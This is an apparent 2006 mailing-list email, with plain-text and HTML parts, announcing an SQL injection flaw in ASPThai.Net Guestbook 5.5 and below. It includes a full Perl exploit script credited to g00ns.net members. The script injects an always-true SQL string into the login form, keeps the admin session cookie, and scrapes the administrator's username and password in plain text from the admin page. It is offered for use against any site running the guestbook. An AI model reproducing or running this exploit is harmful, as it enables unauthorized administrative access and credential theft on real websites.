------=_Part_9669_22649246.1139201383091 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline I MurderSkillz from g00ns.net found a vuln "SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5 and POSSIBLY higher" The sql injection takes place in admin.asp. IF injected with special characters into the login it will grant u with admin..BUT we wrote wrote some code to grab plaintext use= r and pass..here is the code #!/usr/bin/perl # SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5 #(And possible higher could not find a site to test it on) # This exploit shows the username of the administrator and the password In plain text # Bug Found by muderskillz Coded by Zodiac # Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot. # http://exploitercode.com/ http://www.g00ns.net #irc.g00ns.net #g00ns email =3D zodiac@g00ns.net #(c) 2006 use LWP::UserAgent; use HTTP::Cookies; $Server =3D $ARGV[0]; if($Server =3D~m/http/g) { $Server=3D~ 'http://$Server'; print } else { print $error; } if(!$Server) {usage();exit() ;} head(); print "\r\nGrabbing Username And Password\r\n\n"; #Login's and stores a cookie to view admin panel later $xpl =3D LWP::UserAgent->new() or die; $cookie_jar =3D HTTP::Cookies->new(); $xpl->agent('g00ns'); $xpl->cookie_jar($cookie_jar); $res =3D $xpl->post( $Server.'check_user.asp', Content =3D> [ 'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73', 'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73', 'Submit' =3D> '-=3D Login =3D-', ], ); # Create a request my $req =3D HTTP::Request->new(GET =3D> $Server.'change_admin_username.asp' ); $req->header('Referer', $Server.'admin_menu.asp'); my $res =3D $xpl->request($req); $info=3D $res->content; if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) { die "Error Connecting...\r\n"; } #Check the outcome of the response $info=3D~m/(value=3D\")(\n+|\w+|\W+)/g; $User =3D $2; $info=3D~m/(value=3D\")(\n+|\w+|\W+)/g; $Pass=3D $2; print "UserName:$User\r\nPassword:$Pass\r\n"; sub head() { print "\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n"; print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net*\r\n"; print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n"; } sub usage() { head(); print " Usage: Thaisql.pl \r\n\n"; print " - Full path to Guestbook e.g. http://www.site.com/guestbook/\r\n"; print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n"; print " -=3DCoded by Zodiac, Bug Found by MurderSkillz=3D-\r\n"; print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n"; print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n"; exit(); } its been out for like 2 days now.. ------=_Part_9669_22649246.1139201383091 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline
I MurderSkillz from g00ns.net found a= vuln "SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5 and= POSSIBLY higher" The sql injection takes place in admin.asp. IF injec= ted with special characters into the login it will grant u with admin..BUT = we wrote wrote some code to grab plaintext user and pass..here is the code
 

#!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook <= ;=3D 5.5 
#(And possible higher could not find a site to test it o= n)
# This exploit shows the username of the administrator and the passwo= rd In plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|= n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# <= a href=3D"http://exploitercode.com/">http://exploitercode.com/ http://www.g00ns.net
#irc.g00ns.net #g00ns  email =3D zodiac@g00ns.net
#(c) 2006

use LWP::UserAgent;
use HTTP::Cookies;


$Server =3D $ARGV[0];

if($Server =3D~m/http/g)
{
$Server=3D~ 'http://$Server';
print =
}

else {
  print $error;
}

 


if(!$Server) {usage();exit() ;}

head();

 

print "\r\nGrabbing Username And Password\r\n\n";

 

#Login's and stores a cookie to view admin panel later


 $xpl =3D LWP::UserAgent->new() or die;
 $cookie_jar= =3D HTTP::Cookies->new();

 $xpl->agent('g00ns');
 $xpl->cookie_jar($cookie_jar)= ;

 $res =3D $xpl->post(
 $Server.'check_user.asp',
&nbs= p;Content =3D> [


 'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30= %6e%73',
 'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67= %30%30%6e%73',
 'Submit' =3D> '-=3D Login =3D-',
 ],
=  );

 

# Create a request
my $req =3D HTTP::Request->new(GET =3D>

$Server.'change_admin_username.asp'

);

$req->header('Referer', $Server.'admin_menu.asp');

 

my $res =3D $xpl->request($req);

$info=3D $res->content;

if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
= {
 die "Error Connecting...\r\n";
}

 


#Check the outcome of the response

 

$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;
$User =3D $2;
$info= =3D~m/(value=3D\")(\n+|\w+|\W+)/g;
$Pass=3D $2;


print "UserName:$User\r\nPassword:$Pass\r\n";

 

sub head()
 {
 print "\n=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
 print "* ASPT= hai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n";  
 print "=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
 = }
sub usage()
 {
 head();
 print " Usage: T= haisql.pl <Site>  \r\n\n";
 print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n= ";
 print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D\r\n";
 print "   -=3DCoded by Zodiac, Bug Found by Murder= Skillz=3D-\r\n";
 print "www.exploitercode.com www.g= 00ns.net irc.g00ns.net #g00ns\r\n";
 print "=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
 exit(); }

 

its been out for like 2 days now..
 

------=_Part_9669_22649246.1139201383091--